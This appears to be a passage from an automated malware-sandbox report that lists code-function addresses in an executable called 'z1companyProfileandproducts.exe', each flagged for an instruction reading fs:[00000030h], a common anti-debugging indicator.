              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A1C188 mov eax, dword ptr fs:[00000030h]0_2_01A1C188
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A361E5 mov eax, dword ptr fs:[00000030h]0_2_01A361E5
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019DE1D0 mov eax, dword ptr fs:[00000030h]0_2_019DE1D0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019DE1D0 mov eax, dword ptr fs:[00000030h]0_2_019DE1D0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019DE1D0 mov ecx, dword ptr fs:[00000030h]0_2_019DE1D0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019DE1D0 mov eax, dword ptr fs:[00000030h]0_2_019DE1D0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019DE1D0 mov eax, dword ptr fs:[00000030h]0_2_019DE1D0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A261C3 mov eax, dword ptr fs:[00000030h]0_2_01A261C3
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A261C3 mov eax, dword ptr fs:[00000030h]0_2_01A261C3
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019901F8 mov eax, dword ptr fs:[00000030h]0_2_019901F8
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A0E10E mov eax, dword ptr fs:[00000030h]0_2_01A0E10E
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A0E10E mov ecx, dword ptr fs:[00000030h]0_2_01A0E10E
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A0E10E mov eax, dword ptr fs:[00000030h]0_2_01A0E10E
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A0E10E mov eax, dword ptr fs:[00000030h]0_2_01A0E10E
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A0E10E mov ecx, dword ptr fs:[00000030h]0_2_01A0E10E
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A0E10E mov eax, dword ptr fs:[00000030h]0_2_01A0E10E
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A0E10E mov eax, dword ptr fs:[00000030h]0_2_01A0E10E
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A0E10E mov ecx, dword ptr fs:[00000030h]0_2_01A0E10E
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A0E10E mov eax, dword ptr fs:[00000030h]0_2_01A0E10E
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A0E10E mov ecx, dword ptr fs:[00000030h]0_2_01A0E10E
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A20115 mov eax, dword ptr fs:[00000030h]0_2_01A20115
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A0A118 mov ecx, dword ptr fs:[00000030h]0_2_01A0A118
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A0A118 mov eax, dword ptr fs:[00000030h]0_2_01A0A118
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A0A118 mov eax, dword ptr fs:[00000030h]0_2_01A0A118
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A0A118 mov eax, dword ptr fs:[00000030h]0_2_01A0A118
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01990124 mov eax, dword ptr fs:[00000030h]0_2_01990124
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01966154 mov eax, dword ptr fs:[00000030h]0_2_01966154
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01966154 mov eax, dword ptr fs:[00000030h]0_2_01966154
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0195C156 mov eax, dword ptr fs:[00000030h]0_2_0195C156
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019F8158 mov eax, dword ptr fs:[00000030h]0_2_019F8158
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019F4144 mov eax, dword ptr fs:[00000030h]0_2_019F4144
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019F4144 mov eax, dword ptr fs:[00000030h]0_2_019F4144
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019F4144 mov ecx, dword ptr fs:[00000030h]0_2_019F4144
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019F4144 mov eax, dword ptr fs:[00000030h]0_2_019F4144
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019F4144 mov eax, dword ptr fs:[00000030h]0_2_019F4144
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A260B8 mov eax, dword ptr fs:[00000030h]0_2_01A260B8
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A260B8 mov ecx, dword ptr fs:[00000030h]0_2_01A260B8
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0196208A mov eax, dword ptr fs:[00000030h]0_2_0196208A
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019F80A8 mov eax, dword ptr fs:[00000030h]0_2_019F80A8
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019E20DE mov eax, dword ptr fs:[00000030h]0_2_019E20DE
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0195C0F0 mov eax, dword ptr fs:[00000030h]0_2_0195C0F0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019A20F0 mov ecx, dword ptr fs:[00000030h]0_2_019A20F0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0195A0E3 mov ecx, dword ptr fs:[00000030h]0_2_0195A0E3
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019E60E0 mov eax, dword ptr fs:[00000030h]0_2_019E60E0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019680E9 mov eax, dword ptr fs:[00000030h]0_2_019680E9
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0197E016 mov eax, dword ptr fs:[00000030h]0_2_0197E016
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0197E016 mov eax, dword ptr fs:[00000030h]0_2_0197E016
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0197E016 mov eax, dword ptr fs:[00000030h]0_2_0197E016
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0197E016 mov eax, dword ptr fs:[00000030h]0_2_0197E016
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019E4000 mov ecx, dword ptr fs:[00000030h]0_2_019E4000
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A02000 mov eax, dword ptr fs:[00000030h]0_2_01A02000
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A02000 mov eax, dword ptr fs:[00000030h]0_2_01A02000
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A02000 mov eax, dword ptr fs:[00000030h]0_2_01A02000
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A02000 mov eax, dword ptr fs:[00000030h]0_2_01A02000
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A02000 mov eax, dword ptr fs:[00000030h]0_2_01A02000
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A02000 mov eax, dword ptr fs:[00000030h]0_2_01A02000
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A02000 mov eax, dword ptr fs:[00000030h]0_2_01A02000
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A02000 mov eax, dword ptr fs:[00000030h]0_2_01A02000
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019F6030 mov eax, dword ptr fs:[00000030h]0_2_019F6030
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0195A020 mov eax, dword ptr fs:[00000030h]0_2_0195A020
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0195C020 mov eax, dword ptr fs:[00000030h]0_2_0195C020
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01962050 mov eax, dword ptr fs:[00000030h]0_2_01962050
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019E6050 mov eax, dword ptr fs:[00000030h]0_2_019E6050
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0198C073 mov eax, dword ptr fs:[00000030h]0_2_0198C073
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01958397 mov eax, dword ptr fs:[00000030h]0_2_01958397
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01958397 mov eax, dword ptr fs:[00000030h]0_2_01958397
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01958397 mov eax, dword ptr fs:[00000030h]0_2_01958397
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0198438F mov eax, dword ptr fs:[00000030h]0_2_0198438F
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0198438F mov eax, dword ptr fs:[00000030h]0_2_0198438F
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0195E388 mov eax, dword ptr fs:[00000030h]0_2_0195E388
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0195E388 mov eax, dword ptr fs:[00000030h]0_2_0195E388
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0195E388 mov eax, dword ptr fs:[00000030h]0_2_0195E388
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019683C0 mov eax, dword ptr fs:[00000030h]0_2_019683C0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019683C0 mov eax, dword ptr fs:[00000030h]0_2_019683C0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019683C0 mov eax, dword ptr fs:[00000030h]0_2_019683C0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019683C0 mov eax, dword ptr fs:[00000030h]0_2_019683C0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0196A3C0 mov eax, dword ptr fs:[00000030h]0_2_0196A3C0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0196A3C0 mov eax, dword ptr fs:[00000030h]0_2_0196A3C0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0196A3C0 mov eax, dword ptr fs:[00000030h]0_2_0196A3C0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0196A3C0 mov eax, dword ptr fs:[00000030h]0_2_0196A3C0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0196A3C0 mov eax, dword ptr fs:[00000030h]0_2_0196A3C0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0196A3C0 mov eax, dword ptr fs:[00000030h]0_2_0196A3C0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019E63C0 mov eax, dword ptr fs:[00000030h]0_2_019E63C0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019963FF mov eax, dword ptr fs:[00000030h]0_2_019963FF
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0197E3F0 mov eax, dword ptr fs:[00000030h]0_2_0197E3F0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0197E3F0 mov eax, dword ptr fs:[00000030h]0_2_0197E3F0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0197E3F0 mov eax, dword ptr fs:[00000030h]0_2_0197E3F0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A1C3CD mov eax, dword ptr fs:[00000030h]0_2_01A1C3CD
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A043D4 mov eax, dword ptr fs:[00000030h]0_2_01A043D4
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A043D4 mov eax, dword ptr fs:[00000030h]0_2_01A043D4
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A0E3DB mov eax, dword ptr fs:[00000030h]0_2_01A0E3DB
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A0E3DB mov eax, dword ptr fs:[00000030h]0_2_01A0E3DB
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A0E3DB mov ecx, dword ptr fs:[00000030h]0_2_01A0E3DB
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A0E3DB mov eax, dword ptr fs:[00000030h]0_2_01A0E3DB
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019703E9 mov eax, dword ptr fs:[00000030h]0_2_019703E9
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019703E9 mov eax, dword ptr fs:[00000030h]0_2_019703E9
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019703E9 mov eax, dword ptr fs:[00000030h]0_2_019703E9
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019703E9 mov eax, dword ptr fs:[00000030h]0_2_019703E9
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019703E9 mov eax, dword ptr fs:[00000030h]0_2_019703E9
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019703E9 mov eax, dword ptr fs:[00000030h]0_2_019703E9
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019703E9 mov eax, dword ptr fs:[00000030h]0_2_019703E9
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019703E9 mov eax, dword ptr fs:[00000030h]0_2_019703E9
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0195C310 mov ecx, dword ptr fs:[00000030h]0_2_0195C310
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01980310 mov ecx, dword ptr fs:[00000030h]0_2_01980310
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0199A30B mov eax, dword ptr fs:[00000030h]0_2_0199A30B
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0199A30B mov eax, dword ptr fs:[00000030h]0_2_0199A30B
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0199A30B mov eax, dword ptr fs:[00000030h]0_2_0199A30B
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019E035C mov eax, dword ptr fs:[00000030h]0_2_019E035C
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019E035C mov eax, dword ptr fs:[00000030h]0_2_019E035C
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019E035C mov eax, dword ptr fs:[00000030h]0_2_019E035C
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019E035C mov ecx, dword ptr fs:[00000030h]0_2_019E035C
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019E035C mov eax, dword ptr fs:[00000030h]0_2_019E035C
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019E035C mov eax, dword ptr fs:[00000030h]0_2_019E035C
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019E2349 mov eax, dword ptr fs:[00000030h]0_2_019E2349
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019E2349 mov eax, dword ptr fs:[00000030h]0_2_019E2349
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019E2349 mov eax, dword ptr fs:[00000030h]0_2_019E2349
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019E2349 mov eax, dword ptr fs:[00000030h]0_2_019E2349
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019E2349 mov eax, dword ptr fs:[00000030h]0_2_019E2349
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019E2349 mov eax, dword ptr fs:[00000030h]0_2_019E2349
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019E2349 mov eax, dword ptr fs:[00000030h]0_2_019E2349
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019E2349 mov eax, dword ptr fs:[00000030h]0_2_019E2349
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019E2349 mov eax, dword ptr fs:[00000030h]0_2_019E2349
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019E2349 mov eax, dword ptr fs:[00000030h]0_2_019E2349
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019E2349 mov eax, dword ptr fs:[00000030h]0_2_019E2349
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019E2349 mov eax, dword ptr fs:[00000030h]0_2_019E2349
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019E2349 mov eax, dword ptr fs:[00000030h]0_2_019E2349
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019E2349 mov eax, dword ptr fs:[00000030h]0_2_019E2349
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019E2349 mov eax, dword ptr fs:[00000030h]0_2_019E2349
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A0437C mov eax, dword ptr fs:[00000030h]0_2_01A0437C
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A2A352 mov eax, dword ptr fs:[00000030h]0_2_01A2A352
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A08350 mov ecx, dword ptr fs:[00000030h]0_2_01A08350
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019E0283 mov eax, dword ptr fs:[00000030h]0_2_019E0283
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019E0283 mov eax, dword ptr fs:[00000030h]0_2_019E0283
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019E0283 mov eax, dword ptr fs:[00000030h]0_2_019E0283
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0199E284 mov eax, dword ptr fs:[00000030h]0_2_0199E284
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0199E284 mov eax, dword ptr fs:[00000030h]0_2_0199E284
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019702A0 mov eax, dword ptr fs:[00000030h]0_2_019702A0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019702A0 mov eax, dword ptr fs:[00000030h]0_2_019702A0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019F62A0 mov eax, dword ptr fs:[00000030h]0_2_019F62A0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019F62A0 mov ecx, dword ptr fs:[00000030h]0_2_019F62A0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019F62A0 mov eax, dword ptr fs:[00000030h]0_2_019F62A0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019F62A0 mov eax, dword ptr fs:[00000030h]0_2_019F62A0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019F62A0 mov eax, dword ptr fs:[00000030h]0_2_019F62A0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019F62A0 mov eax, dword ptr fs:[00000030h]0_2_019F62A0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0196A2C3 mov eax, dword ptr fs:[00000030h]0_2_0196A2C3
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0196A2C3 mov eax, dword ptr fs:[00000030h]0_2_0196A2C3
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0196A2C3 mov eax, dword ptr fs:[00000030h]0_2_0196A2C3
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0196A2C3 mov eax, dword ptr fs:[00000030h]0_2_0196A2C3
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0196A2C3 mov eax, dword ptr fs:[00000030h]0_2_0196A2C3
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019702E1 mov eax, dword ptr fs:[00000030h]0_2_019702E1
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019702E1 mov eax, dword ptr fs:[00000030h]0_2_019702E1
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019702E1 mov eax, dword ptr fs:[00000030h]0_2_019702E1
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0195823B mov eax, dword ptr fs:[00000030h]0_2_0195823B
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0195A250 mov eax, dword ptr fs:[00000030h]0_2_0195A250
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01966259 mov eax, dword ptr fs:[00000030h]0_2_01966259
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A10274 mov eax, dword ptr fs:[00000030h]0_2_01A10274
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A10274 mov eax, dword ptr fs:[00000030h]0_2_01A10274
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A10274 mov eax, dword ptr fs:[00000030h]0_2_01A10274
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A10274 mov eax, dword ptr fs:[00000030h]0_2_01A10274
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A10274 mov eax, dword ptr fs:[00000030h]0_2_01A10274
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A10274 mov eax, dword ptr fs:[00000030h]0_2_01A10274
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A10274 mov eax, dword ptr fs:[00000030h]0_2_01A10274
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A10274 mov eax, dword ptr fs:[00000030h]0_2_01A10274
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A10274 mov eax, dword ptr fs:[00000030h]0_2_01A10274
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A10274 mov eax, dword ptr fs:[00000030h]0_2_01A10274
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A10274 mov eax, dword ptr fs:[00000030h]0_2_01A10274
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A10274 mov eax, dword ptr fs:[00000030h]0_2_01A10274
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019E8243 mov eax, dword ptr fs:[00000030h]0_2_019E8243
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019E8243 mov ecx, dword ptr fs:[00000030h]0_2_019E8243
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A1A250 mov eax, dword ptr fs:[00000030h]0_2_01A1A250
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A1A250 mov eax, dword ptr fs:[00000030h]0_2_01A1A250
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01964260 mov eax, dword ptr fs:[00000030h]0_2_01964260
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01964260 mov eax, dword ptr fs:[00000030h]0_2_01964260
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01964260 mov eax, dword ptr fs:[00000030h]0_2_01964260
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0195826B mov eax, dword ptr fs:[00000030h]0_2_0195826B
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0199E59C mov eax, dword ptr fs:[00000030h]0_2_0199E59C
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01994588 mov eax, dword ptr fs:[00000030h]0_2_01994588
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01962582 mov eax, dword ptr fs:[00000030h]0_2_01962582
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01962582 mov ecx, dword ptr fs:[00000030h]0_2_01962582
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019845B1 mov eax, dword ptr fs:[00000030h]0_2_019845B1
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019845B1 mov eax, dword ptr fs:[00000030h]0_2_019845B1
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019E05A7 mov eax, dword ptr fs:[00000030h]0_2_019E05A7
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019E05A7 mov eax, dword ptr fs:[00000030h]0_2_019E05A7
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019E05A7 mov eax, dword ptr fs:[00000030h]0_2_019E05A7
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019665D0 mov eax, dword ptr fs:[00000030h]0_2_019665D0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0199A5D0 mov eax, dword ptr fs:[00000030h]0_2_0199A5D0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0199A5D0 mov eax, dword ptr fs:[00000030h]0_2_0199A5D0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0199E5CF mov eax, dword ptr fs:[00000030h]0_2_0199E5CF
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0199E5CF mov eax, dword ptr fs:[00000030h]0_2_0199E5CF
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0199C5ED mov eax, dword ptr fs:[00000030h]0_2_0199C5ED
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0199C5ED mov eax, dword ptr fs:[00000030h]0_2_0199C5ED
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019625E0 mov eax, dword ptr fs:[00000030h]0_2_019625E0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0198E5E7 mov eax, dword ptr fs:[00000030h]0_2_0198E5E7
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0198E5E7 mov eax, dword ptr fs:[00000030h]0_2_0198E5E7
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0198E5E7 mov eax, dword ptr fs:[00000030h]0_2_0198E5E7
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0198E5E7 mov eax, dword ptr fs:[00000030h]0_2_0198E5E7
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0198E5E7 mov eax, dword ptr fs:[00000030h]0_2_0198E5E7
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0198E5E7 mov eax, dword ptr fs:[00000030h]0_2_0198E5E7
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0198E5E7 mov eax, dword ptr fs:[00000030h]0_2_0198E5E7
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0198E5E7 mov eax, dword ptr fs:[00000030h]0_2_0198E5E7
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019F6500 mov eax, dword ptr fs:[00000030h]0_2_019F6500
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01970535 mov eax, dword ptr fs:[00000030h]0_2_01970535
